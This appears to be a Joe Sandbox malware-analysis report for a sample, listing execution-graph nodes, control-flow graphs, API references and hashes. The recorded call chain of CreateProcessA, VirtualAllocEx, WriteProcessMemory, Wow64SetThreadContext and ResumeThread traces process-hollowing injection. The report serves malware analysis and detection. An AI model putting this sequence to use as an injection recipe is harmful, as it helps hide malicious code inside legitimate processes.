                                                execution_graph 26170 150c300 26171 150c342 26170->26171 26172 150c348 GetModuleHandleW 26170->26172 26171->26172 26173 150c375 26172->26173 26362 150e5e0 DuplicateHandle 26363 150e676 26362->26363 26144 b030040 26145 b0301cb 26144->26145 26146 b030066 26144->26146 26146->26145 26150 b030351 26146->26150 26155 b0302b8 26146->26155 26158 b0302c0 PostMessageW 26146->26158 26151 b0302ee PostMessageW 26150->26151 26154 b03035e 26150->26154 26153 b03032c 26151->26153 26153->26146 26156 b0302c0 PostMessageW 26155->26156 26157 b03032c 26156->26157 26157->26146 26159 b03032c 26158->26159 26159->26146 26160 150e398 26161 150e3de GetCurrentProcess 26160->26161 26163 150e430 GetCurrentThread 26161->26163 26164 150e429 26161->26164 26165 150e466 26163->26165 26166 150e46d GetCurrentProcess 26163->26166 26164->26163 26165->26166 26167 150e4a3 GetCurrentThreadId 26166->26167 26169 150e4fc 26167->26169 26364 1504668 26365 1504672 26364->26365 26367 1504767 26364->26367 26368 150477d 26367->26368 26372 1504867 26368->26372 26376 1504868 26368->26376 26374 150488f 26372->26374 26373 150496c 26374->26373 26380 15044d4 26374->26380 26378 150488f 26376->26378 26377 150496c 26377->26377 26378->26377 26379 15044d4 CreateActCtxA 26378->26379 26379->26377 26381 15058f8 CreateActCtxA 26380->26381 26383 15059bb 26381->26383 26174 799d1f4 26175 799d0f1 26174->26175 26176 799d164 26174->26176 26175->26176 26180 799edb8 26175->26180 26198 799ee16 26175->26198 26217 799eda8 26175->26217 26181 799edd2 26180->26181 26182 799edf6 26181->26182 26235 799fa79 26181->26235 26239 799f3e6 26181->26239 26244 799f723 26181->26244 26249 799f76f 26181->26249 26254 799f4af 26181->26254 26261 799f34d 26181->26261 26266 799f228 26181->26266 26270 799f9b6 26181->26270 26274 799f377 26181->26274 26281 799f935 26181->26281 26286 799f290 26181->26286 26293 799f29f 26181->26293 26300 799f61c 26181->26300 26304 799f2fd 26181->26304 26309 799f8fd 26181->26309 26182->26176 26199 799eda4 26198->26199 26201 799ee19 26198->26201 26200 799edf6 26199->26200 26202 799fa79 2 API calls 26199->26202 26203 799f8fd 2 API calls 26199->26203 26204 799f2fd 2 API calls 26199->26204 26205 799f61c 2 API calls 26199->26205 26206 799f29f 4 API calls 26199->26206 26207 799f290 4 API calls 26199->26207 26208 799f935 2 API calls 26199->26208 26209 799f377 4 API calls 26199->26209 26210 799f9b6 2 API calls 26199->26210 26211 799f228 2 API calls 26199->26211 26212 799f34d 2 API calls 26199->26212 26213 799f4af 4 API calls 26199->26213 26214 799f76f 2 API calls 26199->26214 26215 799f723 2 API calls 26199->26215 26216 799f3e6 2 API calls 26199->26216 26200->26176 26201->26176 26202->26200 26203->26200 26204->26200 26205->26200 26206->26200 26207->26200 26208->26200 26209->26200 26210->26200 26211->26200 26212->26200 26213->26200 26214->26200 26215->26200 26216->26200 26218 799edb8 26217->26218 26219 799edf6 26218->26219 26220 799fa79 2 API calls 26218->26220 26221 799f8fd 2 API calls 26218->26221 26222 799f2fd 2 API calls 26218->26222 26223 799f61c 2 API calls 26218->26223 26224 799f29f 4 API calls 26218->26224 26225 799f290 4 API calls 26218->26225 26226 799f935 2 API calls 26218->26226 26227 799f377 4 API calls 26218->26227 26228 799f9b6 2 API calls 26218->26228 26229 799f228 2 API calls 26218->26229 26230 799f34d 2 API calls 26218->26230 26231 799f4af 4 API calls 26218->26231 26232 799f76f 2 API calls 26218->26232 26233 799f723 2 API calls 26218->26233 26234 799f3e6 2 API calls 26218->26234 26219->26176 26220->26219 26221->26219 26222->26219 26223->26219 26224->26219 26225->26219 26226->26219 26227->26219 26228->26219 26229->26219 26230->26219 26231->26219 26232->26219 26233->26219 26234->26219 26236 799f9b5 26235->26236 26236->26235 26314 799c7b8 26236->26314 26318 799c7c0 26236->26318 26240 799f3ec 26239->26240 26322 799c958 26240->26322 26326 799c950 26240->26326 26241 799f430 26241->26182 26245 799f729 26244->26245 26330 799c709 26245->26330 26334 799c710 26245->26334 26246 799f832 26250 799f775 26249->26250 26252 799c709 ResumeThread 26250->26252 26253 799c710 ResumeThread 26250->26253 26251 799f832 26252->26251 26253->26251 26338 799ca48 26254->26338 26342 799ca41 26254->26342 26255 799f27d 26255->26254 26256 799f5a5 26255->26256 26259 799c7b8 Wow64SetThreadContext 26255->26259 26260 799c7c0 Wow64SetThreadContext 26255->26260 26256->26182 26259->26255 26260->26255 26262 799f40f 26261->26262 26263 799f430 26262->26263 26264 799c958 WriteProcessMemory 26262->26264 26265 799c950 WriteProcessMemory 26262->26265 26263->26182 26264->26263 26265->26263 26346 799cbe0 26266->26346 26350 799cbd5 26266->26350 26272 799c7b8 Wow64SetThreadContext 26270->26272 26273 799c7c0 Wow64SetThreadContext 26270->26273 26271 799f9b5 26271->26270 26272->26271 26273->26271 26276 799f27d 26274->26276 26275 799f38b 26275->26182 26276->26275 26277 799ca48 ReadProcessMemory 26276->26277 26278 799ca41 ReadProcessMemory 26276->26278 26279 799c7b8 Wow64SetThreadContext 26276->26279 26280 799c7c0 Wow64SetThreadContext 26276->26280 26277->26276 26278->26276 26279->26276 26280->26276 26282 799f3a8 26281->26282 26282->26281 26283 799fba5 26282->26283 26284 799c958 WriteProcessMemory 26282->26284 26285 799c950 WriteProcessMemory 26282->26285 26284->26282 26285->26282 26288 799f27d 26286->26288 26287 799f5a5 26287->26182 26288->26287 26289 799ca48 ReadProcessMemory 26288->26289 26290 799ca41 ReadProcessMemory 26288->26290 26291 799c7b8 Wow64SetThreadContext 26288->26291 26292 799c7c0 Wow64SetThreadContext 26288->26292 26289->26288 26290->26288 26291->26288 26292->26288 26296 799c7b8 Wow64SetThreadContext 26293->26296 26297 799c7c0 Wow64SetThreadContext 26293->26297 26294 799f27d 26294->26293 26295 799f5a5 26294->26295 26298 799ca48 ReadProcessMemory 26294->26298 26299 799ca41 ReadProcessMemory 26294->26299 26295->26182 26296->26294 26297->26294 26298->26294 26299->26294 26354 799c898 26300->26354 26358 799c890 26300->26358 26301 799f63a 26305 799f30a 26304->26305 26307 799c709 ResumeThread 26305->26307 26308 799c710 ResumeThread 26305->26308 26306 799f832 26307->26306 26308->26306 26310 799fa97 26309->26310 26312 799c958 WriteProcessMemory 26310->26312 26313 799c950 WriteProcessMemory 26310->26313 26311 799fabb 26312->26311 26313->26311 26315 799c7c0 Wow64SetThreadContext 26314->26315 26317 799c84d 26315->26317 26317->26236 26319 799c805 Wow64SetThreadContext 26318->26319 26321 799c84d 26319->26321 26321->26236 26323 799c9a0 WriteProcessMemory 26322->26323 26325 799c9f7 26323->26325 26325->26241 26327 799c958 WriteProcessMemory 26326->26327 26329 799c9f7 26327->26329 26329->26241 26331 799c710 ResumeThread 26330->26331 26333 799c781 26331->26333 26333->26246 26335 799c750 ResumeThread 26334->26335 26337 799c781 26335->26337 26337->26246 26339 799ca93 ReadProcessMemory 26338->26339 26341 799cad7 26339->26341 26341->26255 26343 799ca48 ReadProcessMemory 26342->26343 26345 799cad7 26343->26345 26345->26255 26347 799cc69 CreateProcessA 26346->26347 26349 799ce2b 26347->26349 26349->26349 26351 799cbe0 CreateProcessA 26350->26351 26353 799ce2b 26351->26353 26353->26353 26355 799c8d8 VirtualAllocEx 26354->26355 26357 799c915 26355->26357 26357->26301 26359 799c898 VirtualAllocEx 26358->26359 26361 799c915 26359->26361 26361->26301

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 526 150e398-150e427 GetCurrentProcess 530 150e430-150e464 GetCurrentThread 526->530 531 150e429-150e42f 526->531 532 150e466-150e46c 530->532 533 150e46d-150e4a1 GetCurrentProcess 530->533 531->530 532->533 534 150e4a3-150e4a9 533->534 535 150e4aa-150e4c2 533->535 534->535 539 150e4cb-150e4fa GetCurrentThreadId 535->539 540 150e503-150e565 539->540 541 150e4fc-150e502 539->541 541->540
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0150E416
                                                • GetCurrentThread.KERNEL32 ref: 0150E453
                                                • GetCurrentProcess.KERNEL32 ref: 0150E490
                                                • GetCurrentThreadId.KERNEL32 ref: 0150E4E9
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222939091.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_1500000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 6e725e01e54a2be18796d180e71d58895471954f17f0271705431f3f810b5a07
                                                • Instruction ID: 44252c471eb3993a62684197c04a2806e61fc5b83f64c1f4a579fc7414780e75
                                                • Opcode Fuzzy Hash: 6e725e01e54a2be18796d180e71d58895471954f17f0271705431f3f810b5a07
                                                • Instruction Fuzzy Hash: C95167B09012498FDB58DFAAD549BEEBFF5FF48314F208859E009A72A0D7345944CF65

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 651 799cbd5-799cc75 654 799ccae-799ccce 651->654 655 799cc77-799cc81 651->655 662 799ccd0-799ccda 654->662 663 799cd07-799cd36 654->663 655->654 656 799cc83-799cc85 655->656 657 799cca8-799ccab 656->657 658 799cc87-799cc91 656->658 657->654 660 799cc93 658->660 661 799cc95-799cca4 658->661 660->661 661->661 664 799cca6 661->664 662->663 665 799ccdc-799ccde 662->665 669 799cd38-799cd42 663->669 670 799cd6f-799ce29 CreateProcessA 663->670 664->657 667 799cd01-799cd04 665->667 668 799cce0-799ccea 665->668 667->663 671 799ccec 668->671 672 799ccee-799ccfd 668->672 669->670 674 799cd44-799cd46 669->674 683 799ce2b-799ce31 670->683 684 799ce32-799ceb8 670->684 671->672 672->672 673 799ccff 672->673 673->667 675 799cd69-799cd6c 674->675 676 799cd48-799cd52 674->676 675->670 678 799cd54 676->678 679 799cd56-799cd65 676->679 678->679 679->679 681 799cd67 679->681 681->675 683->684 694 799cec8-799cecc 684->694 695 799ceba-799cebe 684->695 697 799cedc-799cee0 694->697 698 799cece-799ced2 694->698 695->694 696 799cec0 695->696 696->694 700 799cef0-799cef4 697->700 701 799cee2-799cee6 697->701 698->697 699 799ced4 698->699 699->697 703 799cf06-799cf0d 700->703 704 799cef6-799cefc 700->704 701->700 702 799cee8 701->702 702->700 705 799cf0f-799cf1e 703->705 706 799cf24 703->706 704->703 705->706 708 799cf25 706->708 708->708
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0799CE16
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 5a435aa47b1fda42c3fd0e24304a953a6350b6d1d97850b7ba4156a8f42f2461
                                                • Instruction ID: 0d128b994f69bb56d39582bc7dbe22b681b11c3a8c392e8ff63684d26fa3c3a1
                                                • Opcode Fuzzy Hash: 5a435aa47b1fda42c3fd0e24304a953a6350b6d1d97850b7ba4156a8f42f2461
                                                • Instruction Fuzzy Hash: 55A13AB1D0021ACFEF20CFA8CD417EDBBB6BB49314F148569D809A7294DB749985CBA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 709 799cbe0-799cc75 711 799ccae-799ccce 709->711 712 799cc77-799cc81 709->712 719 799ccd0-799ccda 711->719 720 799cd07-799cd36 711->720 712->711 713 799cc83-799cc85 712->713 714 799cca8-799ccab 713->714 715 799cc87-799cc91 713->715 714->711 717 799cc93 715->717 718 799cc95-799cca4 715->718 717->718 718->718 721 799cca6 718->721 719->720 722 799ccdc-799ccde 719->722 726 799cd38-799cd42 720->726 727 799cd6f-799ce29 CreateProcessA 720->727 721->714 724 799cd01-799cd04 722->724 725 799cce0-799ccea 722->725 724->720 728 799ccec 725->728 729 799ccee-799ccfd 725->729 726->727 731 799cd44-799cd46 726->731 740 799ce2b-799ce31 727->740 741 799ce32-799ceb8 727->741 728->729 729->729 730 799ccff 729->730 730->724 732 799cd69-799cd6c 731->732 733 799cd48-799cd52 731->733 732->727 735 799cd54 733->735 736 799cd56-799cd65 733->736 735->736 736->736 738 799cd67 736->738 738->732 740->741 751 799cec8-799cecc 741->751 752 799ceba-799cebe 741->752 754 799cedc-799cee0 751->754 755 799cece-799ced2 751->755 752->751 753 799cec0 752->753 753->751 757 799cef0-799cef4 754->757 758 799cee2-799cee6 754->758 755->754 756 799ced4 755->756 756->754 760 799cf06-799cf0d 757->760 761 799cef6-799cefc 757->761 758->757 759 799cee8 758->759 759->757 762 799cf0f-799cf1e 760->762 763 799cf24 760->763 761->760 762->763 765 799cf25 763->765 765->765
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0799CE16
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: d96913da583dae083d89f7f633d3fc4a47df2d2405e2b3aad2fbd4dbef6d7580
                                                • Instruction ID: ef62d6cd8bd16df6c85b96876822efd149c3b264f800d843da433e39883ba509
                                                • Opcode Fuzzy Hash: d96913da583dae083d89f7f633d3fc4a47df2d2405e2b3aad2fbd4dbef6d7580
                                                • Instruction Fuzzy Hash: 57915BB1D0021ACFEF20CFA8CD407ADBBB6BF49314F048569D809A7294DB749985CFA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 875 15044d4-15059b9 CreateActCtxA 878 15059c2-1505a1c 875->878 879 15059bb-15059c1 875->879 886 1505a2b-1505a2f 878->886 887 1505a1e-1505a21 878->887 879->878 888 1505a40 886->888 889 1505a31-1505a3d 886->889 887->886 891 1505a41 888->891 889->888 891->891
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 015059A9
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222939091.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_1500000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 99e3c7c45740870f72d26191b2ccc8404827394fff07bbc5c6bd62ef7cce801d
                                                • Instruction ID: 28ed243ea9ad2a4490c7b759400af64e50d915fffa36b84e8711eaefb3b44fd3
                                                • Opcode Fuzzy Hash: 99e3c7c45740870f72d26191b2ccc8404827394fff07bbc5c6bd62ef7cce801d
                                                • Instruction Fuzzy Hash: 0341D1B0C10719CBDB25DFA9C884BDDBBF5BF49304F20806AD418AB255DBB56949CF90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 892 15058f7-15059b9 CreateActCtxA 894 15059c2-1505a1c 892->894 895 15059bb-15059c1 892->895 902 1505a2b-1505a2f 894->902 903 1505a1e-1505a21 894->903 895->894 904 1505a40 902->904 905 1505a31-1505a3d 902->905 903->902 907 1505a41 904->907 905->904 907->907
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 015059A9
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222939091.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_1500000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: e6dd11d7eabe4c6bf4fb611cc508ccbe86e58ac1dfa86e8dc20c55f095f5f42e
                                                • Instruction ID: 0b39995efd077779907aa807727e8fa39f408d1aaceef5659220688b8d49a843
                                                • Opcode Fuzzy Hash: e6dd11d7eabe4c6bf4fb611cc508ccbe86e58ac1dfa86e8dc20c55f095f5f42e
                                                • Instruction Fuzzy Hash: EF41E1B0C10719CEDB25CFA9C984BCDBBF6BF48304F20805AD418AB255DB75694ACF90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 908 b030351-b03035c 909 b0302ee-b030303 908->909 910 b03035e-b030385 908->910 911 b030305-b030308 909->911 912 b03030d-b03032a PostMessageW 909->912 913 b030387 910->913 914 b03038c-b03039f 910->914 911->912 915 b030333-b030347 912->915 916 b03032c-b030332 912->916 913->914 919 b0303a1-b0303ae 914->919 920 b0303b0-b0303cb 914->920 916->915 919->920 922 b0303d5 920->922 923 b0303cd 920->923 925 b0303d6 922->925 923->922 925->925
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 0B03031D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2233822959.000000000B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B030000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_b030000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 8b57baf7ac25aa1ca289197479fe7bdeb07977f2d4f7b7592ff6c51b54770820
                                                • Instruction ID: 98218b805a7aa80ea6b8ed9399861da3e2faddaa75c193e22b94c73f6a1e34cd
                                                • Opcode Fuzzy Hash: 8b57baf7ac25aa1ca289197479fe7bdeb07977f2d4f7b7592ff6c51b54770820
                                                • Instruction Fuzzy Hash: 1721CC729052188FDB15DBA4E9193EEBFF8AF48B10F14805AD841B7242D7782844CBA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 926 799c950-799c9a6 929 799c9a8-799c9b4 926->929 930 799c9b6-799c9f5 WriteProcessMemory 926->930 929->930 932 799c9fe-799ca2e 930->932 933 799c9f7-799c9fd 930->933 933->932
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0799C9E8
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 671cd3b02f5d1a23f9ce0434662129f17721a0249588506ecad7efbab367ce97
                                                • Instruction ID: eb87bc795dbd9e11ecad39559749e4095a615a0e0ef68d90843a4f83ae393253
                                                • Opcode Fuzzy Hash: 671cd3b02f5d1a23f9ce0434662129f17721a0249588506ecad7efbab367ce97
                                                • Instruction Fuzzy Hash: 272168B18003599FCB10CFA9C885BEEBFF5FF48324F10842AE559A7250D7789944CBA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 937 799c7b8-799c80b 940 799c81b-799c84b Wow64SetThreadContext 937->940 941 799c80d-799c819 937->941 943 799c84d-799c853 940->943 944 799c854-799c884 940->944 941->940 943->944
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0799C83E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 105352b97a9cdebb10a6ef4061582583f4b41cd60c9990689d5b87228f540171
                                                • Instruction ID: f9e3e17528f723ad30a6571a8b590df5f466c593d17b748ebfde8286579d42f0
                                                • Opcode Fuzzy Hash: 105352b97a9cdebb10a6ef4061582583f4b41cd60c9990689d5b87228f540171
                                                • Instruction Fuzzy Hash: D22148B59002098FDB10DFAAC4857EEBBF4AF48324F10842AD459A7240DB789585CBA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 948 799c958-799c9a6 950 799c9a8-799c9b4 948->950 951 799c9b6-799c9f5 WriteProcessMemory 948->951 950->951 953 799c9fe-799ca2e 951->953 954 799c9f7-799c9fd 951->954 954->953
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0799C9E8
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 03627236e5e6ae6ea0bc7c603ca9e206f128a2de47924d8b315adc20b10296bf
                                                • Instruction ID: 80571474d9ab5edb05b1d1d204a09befd60542e2ef840b53810b0f060f2444e1
                                                • Opcode Fuzzy Hash: 03627236e5e6ae6ea0bc7c603ca9e206f128a2de47924d8b315adc20b10296bf
                                                • Instruction Fuzzy Hash: CD2127B59003099FDF10DFAAC985BEEBBF5FF48314F10842AE959A7250D7789944CBA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 958 799ca41-799cad5 ReadProcessMemory 962 799cade-799cb0e 958->962 963 799cad7-799cadd 958->963 963->962
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0799CAC8
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: bd7a42dc0795d75f6d7455660d5f9cec6b5b75c35752384be7169821268e53cf
                                                • Instruction ID: 6318ee44f74ec4a4319655e3900962d68b23fb00e257073ccab963577bc999e6
                                                • Opcode Fuzzy Hash: bd7a42dc0795d75f6d7455660d5f9cec6b5b75c35752384be7169821268e53cf
                                                • Instruction Fuzzy Hash: 54212AB18003599FDB10DFAAD945AEEFBF5FF48320F50842AE519A7250C7399944CBA0
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0799C83E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 4365359cb1ef895c8f50bcf1890e0539fc643e0c83302e4c033916e1e810c31f
                                                • Instruction ID: 818a0474bf254489b64ab69e3a1cbc3a83c498e41003af2bf66c59089d22d5d5
                                                • Opcode Fuzzy Hash: 4365359cb1ef895c8f50bcf1890e0539fc643e0c83302e4c033916e1e810c31f
                                                • Instruction Fuzzy Hash: 052137B1D002098FDB10DFAAC8857AEBBF4EF48324F508429D519A7240CB78A944CBA0
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0799CAC8
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 39a685c155e88a7801748b85a5206d91d23a659eb21cb0a45b8cd2bc9f20b205
                                                • Instruction ID: 3dd14430597ef0793a01d3a1d9e6066b716138367a2121cf1800b4e162e93b47
                                                • Opcode Fuzzy Hash: 39a685c155e88a7801748b85a5206d91d23a659eb21cb0a45b8cd2bc9f20b205
                                                • Instruction Fuzzy Hash: EF2109B1C003599FDB10DFAAC945AEEFBF5FF48310F508829E519A7250C7799944DBA0
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0150E667
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2222939091.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_1500000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 775455ae35a5f6e6a415e14ebbd9906eb087ecbfef402fcdbb3469c33924a7a2
                                                • Instruction ID: 010eba229dcc2f1e5a938cd1783cf09090a00e025d962174fc8fe42ccedb1276
                                                • Opcode Fuzzy Hash: 775455ae35a5f6e6a415e14ebbd9906eb087ecbfef402fcdbb3469c33924a7a2
                                                • Instruction Fuzzy Hash: 7621C6B59002489FDB10CF9AD984ADEBFF5FB48310F14841AE954A7350D378A944CFA5
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0799C906
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: f155c4bb5b3cb217823e1e88fe92324d6162cb7aab7333f2c76bf3df4e3088bf
                                                • Instruction ID: e22a1b5b6e925365be61dfef03ec1b5640bbd4c55538a2d32865221fc0483f18
                                                • Opcode Fuzzy Hash: f155c4bb5b3cb217823e1e88fe92324d6162cb7aab7333f2c76bf3df4e3088bf
                                                • Instruction Fuzzy Hash: 051159B68002099FCB20DFAAD845BEFBFF5EF48324F108419E559A7250CB759544CBA0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: cda45b086b4ff22095119c230241e66bebc83c9aa0807f361617972ea9fbf978
                                                • Instruction ID: 44b462b7987ce802b79600de292e4c4d9ca1964a81c9c6609bbd818b1cb102ed
                                                • Opcode Fuzzy Hash: cda45b086b4ff22095119c230241e66bebc83c9aa0807f361617972ea9fbf978
                                                • Instruction Fuzzy Hash: A41179B18002498BDB20DFAAD4457EEFBF4AF49324F208419D019A7250CB38A544CFA0
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0799C906
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 942786b80cbe161705bc578f053590463c11cda5a21deb2439c106f54aa77262
                                                • Instruction ID: b01ed68847a3f5644f16a9263ade26b12cbb2b81665742ac13c89ea57d195329
                                                • Opcode Fuzzy Hash: 942786b80cbe161705bc578f053590463c11cda5a21deb2439c106f54aa77262
                                                • Instruction Fuzzy Hash: 6E1137B59002499FDB20DFAAC845BEFBFF5EF48324F108419E519A7250C779A544CFA0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2230992776.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7990000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 970facd986dc463b9ef5609480c17a183a297184cb0f1eb37f5659ccee6aa3f0
                                                • Instruction ID: 470c523aa682fbd9514bdad6294a00fa92a9566e04aebdf183530207e3a6db39
                                                • Opcode Fuzzy Hash: 970facd986dc463b9ef5609480c17a183a297184cb0f1eb37f5659ccee6aa3f0
                                                • Instruction Fuzzy Hash: 8D113AB5D003498FDB20DFAAC8457AEFBF9EF89324F108419D519A7250CB79A544CFA0
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 0B03031D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2233822959.000000000B030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B030000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_b030000_lyKbfEsVYfQfU.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: b51e50f701ee58ccd11574d637a2d672da2115fefa42afa354f5a41a878d4bc8
